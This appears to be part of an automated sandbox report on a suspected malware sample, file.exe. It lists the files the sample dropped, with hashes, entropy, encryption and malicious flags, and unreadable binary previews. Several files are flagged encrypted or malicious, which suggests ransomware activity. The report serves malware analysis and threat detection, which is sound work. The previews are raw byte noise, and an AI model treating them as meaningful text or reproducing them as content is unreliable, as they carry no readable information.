          Preview:SQLit..P.?...Nk..`....@c.....B.5V.`.3.n.,RJ40..z.w3..n......A.....|#PWm.-_....1.5.'...v:.."_2...k..\...M..W..h=y..-....."6.....DT).8!. k......:.0vGg.Dg...-.r....4.J.`5*}&)hf..[T.F.J?*. P.n. b..U..#...K1'C.E....Q...o...o........dp.oCc.w.6.V.pL...p-.=..8..#....)%.}......a.S...H ..2.:..@#V..o.l..cG....=.k...Ir..0D....'[1.}}.i9j.n=......#..lD.Q..S9..K...V...Sg.............?....p<.....8...Z.\.3E5.x........;K....m..5.2.F.w.{i........t...........S.F.O.N. AL.]V!.w."!... '...........J.g..v7.S...dH.|X.KFC..w....>.i?..M......8...]Ru|..Z......s.|YiD.&/Icb.......e._%R.Wa>&.h/.%.`.K9....a\]..!.....9..?"f%./.(+....C2:.E`....z...SX....#..o./(.q;Mu.o.I.y,....D..].-t....<. O.+V-._.Y.*,....S.........a.VQ....r.a.....x.............F..f.....VVT...$...3..s...#..X.s.ia..W..F......|~.f....i..A....$.zo....$*......bO......V....j.....Y.&.-........e......9....L.$.....)>3...........":G.c...L........,.%A..v5S.......CYw.N..f.]....F......d..>z.......2...'.d.B.L.qCdF.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):24910
          Entropy (8bit):7.992428020170412
          Encrypted:true
          SSDEEP:384:wox8kljF/frBk9+Q5RCh0DZvXgDENfyE6pr8XGPj6siHhn9TrhpJPIfK++Vqko6W:woljFjBy+sChFE03LGsiBltIC+kho
          MD5:D87C43D91091BD74DB15B4E963BAEF5B
          SHA1:4F95F642AD68998F78BB975496659C4DDF1E2768
          SHA-256:98BD9B3225B5BE882B8613F90AFDDDFA4242294E43D916F0368AC8D7921519FD
          SHA-512:E37CB2AEEC107DC67F686872F671EC608B00D89A282A62C9F7158EF897CE75CC89C9DB2E0F42F9E25D664967A97BAC101F4ADE7E7F4FB6A72FF88481B842056A
          Malicious:true
          Preview:SQLit@...{.]p..(8..I6....dy..$i...io.x........c..s....7uuK,g..Gj............XJ.!...N.Kr......I.#b.Ol...J7.q+.{...<."n.$Jdrm ..u$f.... xV.@K.t.g..Q:.x).{...0ZvQ...N.n<..$......R...U...2a.:..J.9J|.y^.5<.}r5u.^.V.b.9\4.......7.`..P...2?$*.M>].N.S.5..D..b1.H...&....m.t...nV..6j.n+...p[:. 3.......... .R=.CA..e....B.4.p.H.d......y.YL.c!~...n..e...~..J...Jv...}D..+..[q......@)......+D.V}.*.D.K........x.....%,...U......l......f@l.%zo..+......v+.B..9]..fU3EvH..0vRa...'FX.....}q.....X..../......V.z:%4>q.~6....H6f...0.X..N~.p.,.....'J..z;...:...g.8/.6.....2..r..ml.H8.}<...1.L.~.k..q^.%.A....Jh..x.E...]..".,-..X...d,.GQ#fn..~'.~....^.......#.P...H....1.y..t...n.......9y.[O.D.......O....-./T..;.....ZB....;..~...To;..ac........Y..p..;..y.e.2..K..mh`B....w.H.z..zC...=.....R.x....t./s...Z...I|-..~.I.V.\(...aj......j...AM.O..>}.t..8c.X..j..1.?=.9.+...........Mq....$zZmr...9.<|....=.Ts.+...!R.Z.|..<......2.[...|..C....../...Z..j.......84Ap....i.y fU;....W.+
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2612
          Entropy (8bit):7.934206388557563
          Encrypted:false
          SSDEEP:48:J/4ncldEVVpMwKv7cVPRFz3PLZiTAc4TnyyhyXfReVNrNUQBcX4bcvoQPbvJVCEf:J6clSVVpM5v7yRFz3PLZwAhTnBIfROrw
          MD5:6B54BAC061A1C6DF5432D64588E5A717
          SHA1:B48AFFC6881E6876D69E73A97B31126C7A679DB3
          SHA-256:70231BA7E15E72AE024185A2107653AEFC0F0A72BE585AC5171F3C9CE7A70522
          SHA-512:822066BAB789AC057586E67F71786F4897667311664ECD225FDC1F1B25882C83D394E020D914D53ABD2FD1FA93C7C4E1BA636E1DE981E625FDEA0FE1E480F4B5
          Malicious:false
          Preview:{.".T..w.#..7R.i...=y.O..I...W.Z.....].......c6%...+sa.,..>s<.?..{..Z.G..i#&....a*C...O`......vd.[+>..".....I.I>.G?AW0.p.sG....o.G...`*W%.[...q.i.~.i.....z....5`/.....+.......".....K40G.T{....<.M..]AL./.i...'.nD..W.)..5.)?+0.........V..,.Ajh.....L.%......^..+..\Hp.f.....B.1............6KgN0.X...)@@.@.\...c...r.,i.<$.I8...u.I+o]xf\0.N...r(!..."..Rl|...8j...+.....P:.-..C.>.OKJ.og.e[..g].j.=.m..bv.&6......K.!....Q`..>.u3.E].....]$..?..r....X?.....S.......G.....P....RN'.5.4....?.U...Y..=f..%..;..\4W....;...|.4..t..s..K......mv...[....mr..{.&.Nw.....U6.k...(IQC.[..X...C.......|)...4]..%8.\(]R...&.-..oO.maA..........A.....A....r*..j.@..l...'..5..d..u...8%.luT.V.3hB6J.h..,.....E.Q;..|..@...*..-q{.?.f. ...&...E7...0D.;..O...3?j..p7|.~.5)........._...1>.3...9kf..F..)...{y.|&.}....N....=*#e..rK...)..(...aZ....x@...n..N|..W..6.......Q6....hW..8.......W..z....G..H.....;Hp.e....E.q.S...vkD.?8-.K(....`^.x.CU.zV....[f........h...-...j.h..P.8..M.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2612
          Entropy (8bit):7.930050523795972
          Encrypted:false
          SSDEEP:48:oWQ9ukAwzygD43DjiFesvl5jMU/hmj/1FTs5Hi6VtshGUkSh+4PclQBe0/iD:o9RAtgs3ybAUpmjbTs13Vur84EQo0S
          MD5:F843605A8D86892F26BE4D91DB08D5F9
          SHA1:753795C3F1AB55D84971417F8F3C160A3230487E
          SHA-256:8FF29CF9B5A861D8C71C93389E229EBDBB65A556F78D62A7BF8DFB20B33F3F71
          SHA-512:383E55EB5A665F6DDD6B703DFAFDCD9D7140B6906DA3AD02BAFFD4AA33830121C5021311D7A4989E73296827DF8CA0E5862B84FFC021B29A6B06622256988A1C
          Malicious:false
          Preview:{.".T..P..j!8..QF.............e8..G}.n...tg......x...m..$.-\.....!....Mlo..P...........".....i.0z..e.......\8..[.....{.g\b.]..3,..t.,..%.7.a..3...4........S[}0.w..$n...*.Pq....r...._.\.d.L..sQ8..v.........h8.9`.3.a?..Xj..S....Z.<I.B5..'F.R..,h..?.-.w8p0Z.}..M.^eB.&.8.{.?..>.H...h.;T..l..N..d^4..)..u.'.z`.hM...U.._..O....-....e.....m.<R8..VQ.5...........~e.M..d(....}.Ac._<.y..~.b.H(V.r9W..0q.>.\7].&#w.wD.)Rd..x....1....QR.(.L.....Z-....Q.;'..&.....i.X..}...Z.6}6........?!.Y5....m3.1.pL../~.C....../SQ..h|.........~..`...D...f...<W....%.8..oT..'7@<.&....hw9.2...l"...s...=.0.Y.u....;......<........ ^......RP.1.$'....N.(AI...^...pys...b..`.0y.T.4....]..F.N3....+.*..9R-..^....2P..{.%xUmT:|d....H./...G.\ET......f.....h.*.(+....h6Du..4.x..W......q..IZ.....`...........v$.Bd...q.<-y.+8bU.Pq...B..hU=P..@_q..d..IV.(..%.W.S.$>17.b...fY....A.D.$.{.*~..p,)O..O,FV.'.t..}.@...O.=TbG.8...1......U.+.....8.K....V>x..F....EF....[....@6+...\e..g..T.E.i..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3018
          Entropy (8bit):7.938229355255959
          Encrypted:false
          SSDEEP:48:MN0e6s125xuCjehkRiNXM0aF8UpMt5AA339kazJVaJej7sK0iD:MGeR85xJEuCXqhpk5l9baYj/
          MD5:70B39A50F0D2126F99EDB358B6E1E1C1
          SHA1:466CF4491286CB2890CE8D03136BDB9E1D5A8BF9
          SHA-256:6CC00FAB4D0C9EEDD5615E384EAE65EB74F4D8A3C06917B7649BA815C4FB4CA7
          SHA-512:40803AD041BDE496547B0DD3682B3B223B0FF0A99DD47AF6318C6762C34696A1DC7B2E12E45AB8582E3C31A9EAD227D6953DC1FE1B38F40C62C9563A4C8A4065
          Malicious:false
          Preview:{.".T.38`.k.C.t.W..1...#S........V...G.v.f*....VS.E/.....zh..4.|VCo......d./.l....l...rePO..26.u2...."...`....... n....,..2.T.....H..F..,...T....$o_Od8G..$k.5.iy.=;.t.ki(..V.........gBE...b....&....&...bI.M5.\b.1..&C..`6..F.._..d.AOs.Y...R.../(MB..D*2.,... ..+..\..e...._.j.T....U.@N...>E.gTg........N.....sp...{.2.H~wiV...T&..L..cXm..s...Q...H....7..1a.l1f..b@.l.#.......;..s..0....B.6.6.(S..:..... .....g)w..P...Q........3...~........04^......-9.3w."..Kc]&....L/,...K..8..../....,~..]../;....y..l.[...;...ak.:.j..*..+DV..h.<....9.)...I%i..8..6.b>J...,a;}9;.q..O..;..J..kl..H.C....)L.E[..$o4.uN..........z..'...@.I...d,...J.<.N{..P..Vl#+'A>.%.*.F.8............zD.6..v...0.".f..&a..[c f2S$V....K..cr...m..AL..$Xv.:M.........A.L...+-..3...Q.;!O....V.V..!+....c..L_..T.QM1.3.?.-./............. .......6..EJ{..=.yr_...(.g.S3.^e.E.x.v....Q.K`..$.. ..N..IPW...Zx$.. :W..,._[..........v.......&.$Q..y.K@.9.L.o]....|.h.N}.. meu...k..&.<.!....[?./Ll&..6}.2....`.a...y
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2612
          Entropy (8bit):7.923979393824096
          Encrypted:false
          SSDEEP:48:Xg9WbNBKsr/BuHRLP7f4vnKVbYbrEGxzyWySewReJ+5KiD:Q9aBKyMH1z4vibaAGxztySewRD5t
          MD5:15AB40B24C22A72EEFF5DE78E6D2BC3D
          SHA1:EA5DEA5BD58A55C2CA3FC0719DC0C07FAF3D1227
          SHA-256:3F6FAFAEADDEE222050F0BC303F86885BFDA35693D303007BD5D3014EF231DC3
          SHA-512:29CCF6D789BBA5BF87084401619D01B3496D984668E5A7F20C67CA1B2EC3C5FCE7ECB5C1D47795E69727B219621409ACD57F5989C19FB56669DC8605DDDC2B23
          Malicious:false
          Preview:{.".T'J..ru{.r..;..OZm..HS.S.:s"....r.@W.~..a.....:A......?.'V)....`@n'..t...PQ.P9....QN.r..3..y:L.{hJ...9...vq\"..n..ot.l..m.8....7......c..........y.....IV.e..3.W.6...R..r.k..s0..)/v..]..a..}.5D.oK.f...c..7..Y...W%....b.....~...Fu..`}3C.c.J.$@[..-~_As..Ru.7|...B.+._$.....;..Z"....D*7.3P.j8.>l..S..x+j:s.......k(.'$../.6/......u....E7E..."]...n.F....%}..?S.p<....jZ..........pZ.9..z[.!..JnmD...y.x*Rr...=.f.oA(.a........CEG(h].1eU.7..l...)..k&wL.$.......#C.L..c.HS..I.(....9........a..[>......qk.%.d..sG..L...+.n...>\6.h....@.c.R..<f..7..R...."[...]...........=...X|...S.).9.ye#.x.K..TE>..bR...&.(.....a...'....'..>.........FjF.8t.G9..)..b.4,...*.{bg....a.~.....H.6.l.*..kR.Uf.V......N.r....5.K<.XQo....,...tA.....X...!...2......E..6.Y.)..m..P.wgE.03y#._9....{g..#_).t..)...m.Y..G%..i...Q.j72.....{E..pBD.....O.6.E~s.A...Wa.9.v9@.K.Y{.].b.:.[......'.Z......8{..~....=.c...=...jX....{8c.......}.T.6...&.k..4...wY.F...5.....[.%.T.......2.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):4956
          Entropy (8bit):7.962757682740967
          Encrypted:false
          SSDEEP:96:ain+96nOGM5T8XEe9aSO4lL4VTzoRR9bCww7tuWRy/mbrBlbXhkZ:R+9gOGM5EbH+M2TYCXWZ
          MD5:903FA73EA2D0FF6E1F4DC0355224E338
          SHA1:BF4E761AC84BC23F3DED204D4CC6EDF82CCA92FE
          SHA-256:6FE5E2589D621D103E9FF3486FE8428B96E0D05EFA13B06663B3CC55C3EC210C
          SHA-512:70A60F23E2C745BF9AB188F98B249C7F6FA6817A7132D22A267C434D64729B547335D1808A17687F7C2838CED3CCB66AF70867272AF51ABA7FB233388003B7AC
          Malicious:false
          Preview:{.".T....I........;r.....<.K..$.K...O..'3..!.7.?...`VA...$e./m...~...._.....9..:..w....@..#...PXN.._..`..1.?..*j9\N...\..>........N..j....R.`.......}....u........e.k....g,......N..v.2.7.T.z{~R.%.... .d.....ED..^..9Z5.>0R`..i..5.7.!.R...$Z.M^e...V.....JQ.t..._...\ ....Y.:P.|j.=.#F...c.$/f.......6x[_.....O..`..Vt..%gQ.....^y*..n.bq}...(V....p....2ah..&...^s..{+4y..A.S.p.U.....~ZDu...g;.P.....F6..m../......&..h..."...~....M9t......N.R.NA.....Yw9.....i.: ...nt.m.V....j....>R....).<.L ...q.#[.:.......a3B..3.....t'.K.FB...,.5#C..;..........0....5./.`/...Z.VM....../..CB{.cC.d.[.hH..~.R..s....X....;.....ef...U....W6.j...m...97...>z...\c...:.t-l......(R.:...p!.}z..<.]l.l...v,.......Q...NZd.....+.......K.x._l::.$.....P..qRi=..5...%#.....\.^.C.......,B}rN2...hV..$Bm.0....*XB.P.:..#U.0..6h..{3p...D7...k...I..gR...R..b..,..^@._>....:..W....?6.6....g......`_......@.n...>#7..4.P@..rU.....iz'....G.....W3.s.E$..m.f.b....?<W.Eo....K.^u...?.p.T.AZj...r+..`8....\x..U
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3018
          Entropy (8bit):7.929985237049024
          Encrypted:false
          SSDEEP:48:pOTgd3SO5gnIY9wqaB7KfNnF+a+IvlJzG37/nJjEoCNGc6Tqcnx+aKrKiZWQxIFa:p8nI0m2fNnQTL3zspo6eHRmn
          MD5:27A28FA9F0C4B23C4EDD4B4147BFE7E7
          SHA1:83CCED85D7084ED8A3A91F3222E9C9112FE5E3C3
          SHA-256:82546B11D4EA37C0D6CA5DE706BB5AA475969131EA304EFA910C7ED71BC3D225
          SHA-512:71E2AE983B9AE7782CD1E73FEB4F37862D069409C3B97F4CD03F1E6AEF19300F571124C8CB22AA426B803D5CC48403B24DF0B80B4235824365B31356CDF51724
          Malicious:false
          Preview:{.".T..</DI...x.......E....J}N..6.n.i.........u{....6..........w.q..[..p.3.f...iP..(...V...7.>.T..X..&...h....I.k.......b..0...M?...(.7.T.Q.....V....^<.+.j.._.)...y.|.?.......`..._.....S.\.9K....j..s.....W4.J.~.b..lJ^..d.'.x.x*......mC..s..sW.......$...6b.;N....j?9.rW..Z.O....;.LTi.......N..n....s.....$.<................Z...8*.g.r.....\.x...G./.".I./...a/..I.+b....).$.w.!....-.........^...M<....o~r/x..b.....?.A\.......>../7.m.n\..T...~...@~......j..W+...Qh..U..d.R.......v..|..}F......8[..g..~.....Y..B3E...&7e...9..~..x(Rod..f.R.S.+....D9k|d..F..H..G...]1GM.mX`.d...*...?...(-..oK...Z.8.Hg:.7..}...c..D.....G..../.{..a./.~~..sOI![...wl.O.'.1<..!.....C.E$./I>L.z..f...,~......(6...i.....Ld..u."^......d..'..`..S...........4.v.......w..y..#..3...).Z.s......;O.....>I..G)q.....o.&.V.>.;...H...-+..=.._?..!..Z..M..h.4.p.hk.............O...b.gF[._|....|.6....FS#!.0.w`Sk./_..........s~..yh.$.....S.*@|.... ..T..|h...=.Q.....J1PeB..o..I.[d.. f.......$.Z......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2612
          Entropy (8bit):7.920867448303719
          Encrypted:false
          SSDEEP:48:Twgi9lqgO7jrX74HE2/8ZehQ263+VMtFStmA/fGp5VZ97MsE/ZkAEjiD:c3xO7fXox/8ZGG8MtFGzf0cXt
          MD5:E3F88F76A4C905991E1BF2178A4811AF
          SHA1:3FC23F894CDA46221DB089E09591978D9F79506E
          SHA-256:173F87203AB4D203B5EDEC6EE4801EA4352716DB4207869C760FCEB039CBCC1B
          SHA-512:24611755D84872BE97AA862BBB4DED573737289FBB01B2E9A58092A3C58131C8C0F362D08F32D1A496E1D4D3CA04FF817FD36FEC34624EFCD0F3BEC7934AEA40
          Malicious:false
          Preview:{.".T......dw5.....n.,.1..%t..%..'],._e..N.GsA..y`mE.h.(..+.?..h.....-../"O.Q..DaC......w}$>.D.~....c.X.p7.&.......e..|C].X.....w.=../....N....]..\.1.M..X.......yP.'O....(..L...U._^..%&.R......5...fU.LoB?...S..G..R>A....9...x.].......5...,n.y.........;....,....6.8.`{w. .,%7.....k..x_!Et.,.<...E..O..].z.3.....2-.^..-$......IX..."Tx({..V....}..<...E.ih.^c.b..p.Tqy5PAo.B.Z.,\i...A..<...?....8.Q..+...h...#.i{.b...{o$.|..-..`..D08.A..}..a.=..x,...^.8......;?f=.......W..........<(Z..RV..$%..r...>..../...z#..@..:...l......C.zE.%..F.T.J&.T&....5b'm%./..!.h....'W.....v......m.u.@=...#.AL@....g^..Q;i..L....G.!.K,..{.).p.`..[..9...1u.....i..v.L....r.....A.X...[2T......o2.E-].)......W.Sej.....$.....mk=..k.I..X..D@..&G.4%.7.Z.).T.N.U..3.. ?F|j(<.....Z...8_.......1........Df.i......?..%.V.zdU..<.g.!..zhh..i.Y..o..6.O..'....s..Y.+.u.l."'.....8....".6.N..)x....K...MM..<.|.j..GVJ.X.P:.M. ........K...N.........=K.W..M..q,.Fq..=..(o..U8......t.x..>......8
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):770
          Entropy (8bit):7.65412094846383
          Encrypted:false
          SSDEEP:24:VdLxHJizBpysGkfStBRHMMIJ1pCqiTkbD:/LxpABikqtBKn1GiD
          MD5:5F6C1DFABD5FBA9A992BD2FB95EF2187
          SHA1:6AFBB55440865598591D3E6EF8ACB94B32F12457
          SHA-256:D2F68C52890FE73BC7F90507B8AD54980DC84BE36F94B1944895FF38A1F4D454
          SHA-512:9301E1983DC3A94D88DA7A6E523CF45A17F37782260528E64EAFE13B572699BFA4D3D5A01E0B7D4C65874B3CE987162BF59966A23F9CF0360621B8D08F75BB1B
          Malicious:false
          Preview:....B.[}....8m..G...Q..e..?LvJAu...\.[.7.l$.5..GfJ..C|C...`..........,.6o~]..... ......? ......w......z~..15Ze.;.3....HH.[..;\..5^..Cw.~...@uwB..GjW.=;.~`.a...n...._...../"..>....kkP..u.;..?C`...~......J.r.......Q6}.....C.j....3+p/##.O}-..oq.....B0..D.m.c.&......~..?.q......w.=.X...}..J......sq$]$....v....V.`[.a......e.s.......@..,m.97..4...M...#Y...w.....?..s..6...X.b....*...{n;sX7..W!...].aS-.5.;cl^|}{.w.0.=I.H$.....7:e.Vu..J~:..C1f..i......o..V|...:l,r.Y...SR]....~P....w...A.....R.h.`.bT..'..4.y...~V...z..m....w[S..X"qU...4.s.z.K~..1........nC9.._..n.4.z.m...".50g........?-...Q,.......&.. o1i...E..<..n...o....c...fj....C......8...@..._...#.IM.0R.&c....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):424152
          Entropy (8bit):6.332088787074046
          Encrypted:false
          SSDEEP:6144:ATXRuayPK73OqT4F5no+LIEN7m+vyJfbnQkK96B88yKv4bWTmTvEiLSZ:ATBuay0OqTu5oiIERm+6dF4/S
          MD5:C26645E76992A9EF82A539C8125007CD
          SHA1:18FC3800E2EE980329B57EF46D2C02724F91A75C
          SHA-256:12F067EA22E1F0AE830B69DA2551F889BA2BD302A055CB213EF72E34B0D38295
          SHA-512:B5944B5498707955E634F354697D1794303B695D35B158D5D51312DA7AF0C8810875860661F0AF59243EF7DC3C419ED4A7E3F3D63DFEA9A4C4446A57C0C3B943
          Malicious:false
          Preview:...P..E:.c.H`JDR.v.....B.An.%.......N._.....c....he......_.)....M>......;...l...p.:k..8P.;.....\....Y....][9.}&.k...0....ZK...8.ki...g..Rf.~X..D.|@...7.N..jvj.......x.4;.[...!......y..h7.a..1#.h...:|p)..F..4.....,A.;`.....J..}.q;.U.2..Z..4....N...rL$..z.G\...b1hO.F:.._)S..v....=.g.;.0..F....~x`_r^.ND$xb.4""5..*...+..~...-&....0...><...1..B.R.............9.a,...........z....L.TFD...3..M....&..5..+8......h#._........4S.`.Aww...He&@.....?...xV.~......3.i...x[...yc+h....^@ ..A..E....#.....Y%. ...5F.\BA......$2O..-b..3.. ...i......P.M.[:...L.S.x..i.4M}C$h....I...\|.V.....H...{..1....$........8"..QDr.vI..!...U........$.8..3.O...3...........2..|S\.l..2..'..w.o...N./{...9.....2.........[...;x....E..O.....j.................*.....+..u*.R=......c.m..[....bi..51....M..C.e}...C3...p..F.......{4A...l.;.s.!.k2J..m/Wr..ML.QH..p./R.*.V..'6.q.3.1.......{d....b..0..y.'..e...S.{[/;...IQ..c..9..>...1"...c0...}.....HO..v.4..B'.U.6....x.-....0fX.W.8....XH.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16718
          Entropy (8bit):7.989661694922751
          Encrypted:false
          SSDEEP:384:6X0Utz+5NL3M56WetPVNr4fDRgiiB57Aek9VMqwaL8fPD8fXKBWr5Z1GjL:6Xptz+33M56WMXSuiiTA9aJIfXKBu5iL
          MD5:A13B7343B684B28BB0561FA75AD9C8B4
          SHA1:AC5F0A445BFA32948A2DD77E99785795B3865DDA
          SHA-256:29B2BF9D2C04FC691CE008F58B9E63AFEDB9BED8612E2D785967E1BAF5882946
          SHA-512:D9F2207AC9BC3DCDA0D243A7D919398DE6B087F3997642FA81370839B17AA4E841F576778A22F0595F238405851E8AFC062832F5376DCED92DCFB7092161E3CF
          Malicious:false
          Preview:.... A......s.Q......*Okj.2....e.h.J.._.5....f...#.7..K...1..@W.%....+n.|.. ...{\D..4I...QWT..Zn..c.<&...viN....X....3..Ef.(y:!..%"%3.#..7...\o.}6.....O...w...J......l.A6..y!..X6....-o.?.~..A.DY...&..[.....`nat...cIs.....Q.=... CQ...I.FY...^...G...B1...y.'I....Ib.~.9..R5I. .cm....h..).6.Q....S.X..i..7$r..k..^.+....c..bb.je.v.U.vb..<;.ei#AQD...U..Y.bk..z.%.wM.....d&.U...{Uo.r:/w..-.o.>.E.\.6i....0e.....\R..m..w.".3.......yU.......=Z.O.....o..T#......7...geE&..G*'_...:;@..B4.b..E.-#....<...C..|`..y.7o.&.....sue.x..l.q(..q..7J..7..N.......t....TN;c*...yl_m<..%...?/..>J*..f.]oE.Y.!V>....#.H..l}.0...4]....q.....1.....h".....t.St...B.u.j.0.s..&.......t...o>9....6~.........P....e......LnIbJ..|1.<...R..u.I...Y..)k.nE.0.%Z..^~...e,.$X..L...$..+...N.a..&=It..#>M.w.&.....bV.....-..A.b..L....%>....MUF.."..?...cR...>.i~A.1..*....}.T.j..<2j.....n....Q..t..+..l.`.&k=6.'.z..].w6.:.2.p].g*...t..E....UU.*.h..M|...W.....$.DVy.....]jt.K'e...|.V..z.rt.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16718
          Entropy (8bit):7.989466208727722
          Encrypted:false
          SSDEEP:384:zfOLJiqOpUya3wbVBbodu1/wqLX45b9tN/XT5TK0IH/UJxTn3:zfySmyaEbbn14yX4XtN75AUL
          MD5:1050BD7C6491486D4DF82F12619B7516
          SHA1:90E083A9A4F7DBDB1AD9D086488D49F8339B8DBF
          SHA-256:FED8F7D0DA96469D1135C946DBB330CB18C259363FCF3F8044E38F9E74BBF3DB
          SHA-512:5FD6AB0D745E8477F95D50730A8CBE08CC5F60F79015505DA96F2F18C4D7EC5F5613C9E0ECC31F0851B5EE4D9A3E33BC20369DCE002D08338B748B49EAD58E49
          Malicious:false
          Preview:.... .&.}.W..U.....O...=.r.E.....A...........X..~ .(..{k... uSS(l.....o.y..r...YO...~....^....;.1.$.IoD9q....u.-..p.....v2I..d..g.h..m.+)VW........y.I.^j)Dk...A."2.gD.U.{.B.:.Q..-?[.Z..\.*._...?.2i.Qt...Q.H.G.Rl<....J.h...c{.9.4X......[.......]..m.x....|..A ;.t.n.ql......_z.......q.:2.1=i... ...o.....x.%....?...N.vE.e'QPpr.`0...Mnw.7L...t..9.v..{.......J:........o..b..t....s..8[V`......,a.../...MO.*._..Y..K.9kK.i'@.........s.eCJ....a..r..x.5....?h...K.9.`.k^u....N.._g....b..d..2.y..8.$..w6{~%.>..,.C..dV........c?...S....@.q...8.p../x.........^.5...R.....*a..M.6.....8M.;Ax5h..jh.u. .`....x.i.|.t(u.f...f....;.8fY...,..@.e.=*.d.td.........xn.5..5...=.>...h.4....>..8...y.ljd..@.H..........~/.~...I~..d.B.?...<.._:....K.u.5."(.x.Hx,.;.-...U.-T.;7..o..^a..;....7CC..g~.{.PZ.%..Ou.... .id..'.qG>>Y.A..DjyU.=...I.zHFq0iG..$.C!{..[8~m.$..<.....*{.v!..."..n.... .9.>[..!.hb..M.B@..x.=f..IL%.....,-N.!....}.`...Ln..+....]7....s..Q>..F.@S/qV..].*.o.^
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):424190
          Entropy (8bit):6.332093352381838
          Encrypted:false
          SSDEEP:6144:Z5fd5vKwVhc74FNPL7puze0ob+m+vyJfbnQkK96B88yKv4bWTmTvEiLSr:Z5fdcaL7X0g+m+6dF4/s
          MD5:48C343766EA5F381DFB87088A47BC480
          SHA1:97FC6315A710E7ED232147FB5420F3CFA5172553
          SHA-256:4A9F77C4ADFBA98C7FF439CF4A66CE2F48ADDAC5A6AB3F22F99F5D37A4B2E27E
          SHA-512:8E31A8426B1EBC5CADF534393A7C007FE27E371FA4BF3FB9632D196A8FC98401BBB05E2C029498099B079300A725BDC422DB500262B018DE987D1837CFBFCB3B
          Malicious:false
          Preview:.w.. E.l$...j.5.|/.u.~..F.5.8|.X.[....J'.hV..#.^.../.z1J."....gDs.Kv..l.&wR..T%_. Q....L:'.kM....z.n.......o....3i....I..f.4..?...@O...0.2...L...|.6,L.l.t5._.Nl..5[tXC...iP..b....!.FyRM....7..d.}....='[9.D.].1.....:v2.x..ui...>...x..<..Q..~x3...)Y.......h_.la.<D..3U-S.n.........*.o"..a.@x..<.....{m...^..n.....V.Er.....{.q.0...p.*,H......S..a..d...w...W.......F.d^..............m<.f.......j..N^..29.x..k&...~z.w]`Y..:`.H2.*.B......A..Y...{.Y.>....EW..*....L:...._..z0..V\...<.=<....H....H.*z....I..Nj`......Y..f..$..b!...:..8 .&.,2...H.....W.........r..L.!.5u..3S+.. ........*_X....j 2..y{..KxD...6)/M..W..[....E2.e..g....vA,W...>.....XywH.Hi..z..K{g);.H............%. .[.iU.1.....|.....^o........".uu/M...J.Y..d..w... .3......U...u.......-V.V[. ...........^h%.C1..%....(...4.......G..s.U.Q...Z...b95Q....).U.ozj....<..N.H"....J..L.;....5Qx..7........2..-.mU&..spp.qy..1...M.....e.i .}..Y.E......{.8.j..;..\.....z..|..y...Q.W....m)lB.....Q.l(3..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):104126
          Entropy (8bit):7.99811938602264
          Encrypted:true
          SSDEEP:3072:lSveuNBCgawbxxaG7zh5yddQm+fu9GQDBt/:0Bvawbuoz+SfEl
          MD5:7C2BF8BDE8C368F98C35A483ACE7404C
          SHA1:33D61D1D612FE76AFDA917920F5C0EF6E461BA16
          SHA-256:D26DAFF1C5EDB7A4868E528A75CA3898B7B5D594BBEE010A7D95BD5C8FC3E81E
          SHA-512:B336C8A9DCC45F4BFACC1037827518D0454B51F95F6571F516B65C2C08EFB49518FC5918310E892B297E0B55093AE28526C74F21E0DB1B9C1C8274C3D49975A9
          Malicious:true
          Preview:....hI..<............B.Z#../R...k.g?.;J....]...Y.@VF..:.a..w.Td.....\K.%.e..yz..Ki<)..Y.5.x.....B..\..7........$ZDv.).8@;vND.X....}L=.-...H......HOd#........<..?bl.........AaU2.n<h,P.z.l.\.....N[.f.1...n..,..#....f-..b...[.S$8.3.T*.y.|.e(....N,+.....6.....&Z;'.@.....]9.H...%k.DS...CK.d....+........Fl.O..R.u}y.Z..nn..k.....B......yZ.^`..9.a....8.w..)...W..s9T.r.p.f....V...W.7w5 6..td.a..}....O....v.-z....m9.b.....|.K.[...{|...VBu....z$.....D....|....l..r)sq...F)...h.X....).t....}....s.|+............?#........=..`.+z..4..U.(W....$SD...h.&....1.5..~.......!...]z9......<.T...!S..Y...H..Y.L3...x.qj...qwH...a.cl..}..]Xs^..C}.I...l.J.,..)^zp.:..L(;..t.0<f.D...i+..)p....p..........H.I=....l.9O.fE...8..../.zQ.\v........W.$.N.T..3.*".N....%...=.{ ....L`H....{.2.........8.'.j,.o]H...m$Y....dr@.`).7y.xF......+.JJlC.......X.a..".Ui.9..@*{..P........W.E^...g...0\.......L..M!...G)X..r.mm.7f..;..".a...i.G...].m.......w.L..s..l.u.)3...c...06..(..].|......e
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):102878
          Entropy (8bit):7.998340223273957
          Encrypted:true
          SSDEEP:1536:du8ZzuFw/fh+HF3GZ5ik9gPuURnZbAF3+M7PeJxThH0bq5RM8qnYWgt:du3y/5K2ZsmgHRni77PeJVF0m5WDngt
          MD5:680D710588F156FC3440BF629F55D105
          SHA1:056EE150C6719EB4301B1FFCC2CE164B557AF00E
          SHA-256:4F35D341A4538690B295329655317A801C0010EF737B116A7C1083570094E20F
          SHA-512:D559EE2D42D704BF5453C2513F72D17B9A5353533EF3B75BFFE1D7B89DC870304CBD52BD513DCFE2DFCB06B3FE419C62815CE107630B8E8092A2AC0CAA2A6B3B
          Malicious:true
